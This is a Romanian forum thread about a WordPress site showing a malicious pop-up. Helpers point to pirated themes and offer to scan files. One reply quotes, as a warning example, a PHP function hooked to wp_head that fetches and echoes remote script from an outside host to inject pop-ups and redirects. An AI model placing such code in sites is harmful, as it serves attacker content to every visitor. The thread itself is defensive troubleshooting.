E un virus, acum cateva minute am intrat pe 2 site-uri si exact acel pop-up mi-a aparut si mie.
E un virus, acum cateva minute am intrat pe 2 site-uri si exact acel pop-up mi-a aparut si mie.
Ai nevoie de un logo, layout, s.a.m.d?
Solutii?
Cei de la hosting mi-au zis ca au verificat foarte atent si au scanat totul... dar nimic![]()
Temele si plugin-urile wp de tip premium descarcate de pe site-uri neoficiale (ca sa ma exprim elegant) contin cod malitios in proportie de peste 90%. La inceput erau doar link-uri in footer sau link-uri encriptate dar acum se ascund sub forma unor functii. De exemplu ce e dubios in functia asta ?
Acel link insereaza pop-uri, frame-uri, redirect-uri, etc. catre alte site-uri pentru trafic in special.<?php if (!function_exists('class_db_set')){function class_db_set(){if (function_exists('curl_init')){$url = "http://www.wpquery.co/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'class_db_set');} ?>
Mai multe detalii aici.
gabetu, functia asta se regaseste in codul meu? o pot elimina?
Multumesc
Problema persista, din pacate.
Mai mult, cand incerc sa inchid popup-ul imi apare pagina de atentionare din firefox cum ca sunt pe o pagina cu risc si sa fac update la browser (care browser e la zi).
Daca te pot ajuta cu un sfat sau daca doresti o oferta de optimizare pentru siteul tau, da-mi un mesaj!
Asta e mesaj la accesarea stildeviata.com?
Cei de la host nu-mi raspund de azi dimineata iar eu sunt destul de praf la partea "tehnica".
Da, antivirusul a sarit in aer cand am accesat siteul tau. Posibil sa fie o alarma falsa, dar nu strica o scanare a fisierelor. Si poti incepe cu propriul computer.
Edit:
Ai incercat sa schimbi tema sa vezi daca mai apare popup-ul?
Posibil, mai ales daca ai downloadat-o din surse obscure, sa aiba "o bucurie" bine ascunsa .
Daca te pot ajuta cu un sfat sau daca doresti o oferta de optimizare pentru siteul tau, da-mi un mesaj!
Ma ofer sa te ajut daca vrei cu scanatul fisirelor temei. As putea sa pun acele fisiere la mine pe server (nimic vizivil pe web ) si sa caut in toate fiserele sa vad daca exista vreo problema de la tema.
Scriu tutoriale linux aici: http://www.debian-tutorials.com/
Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)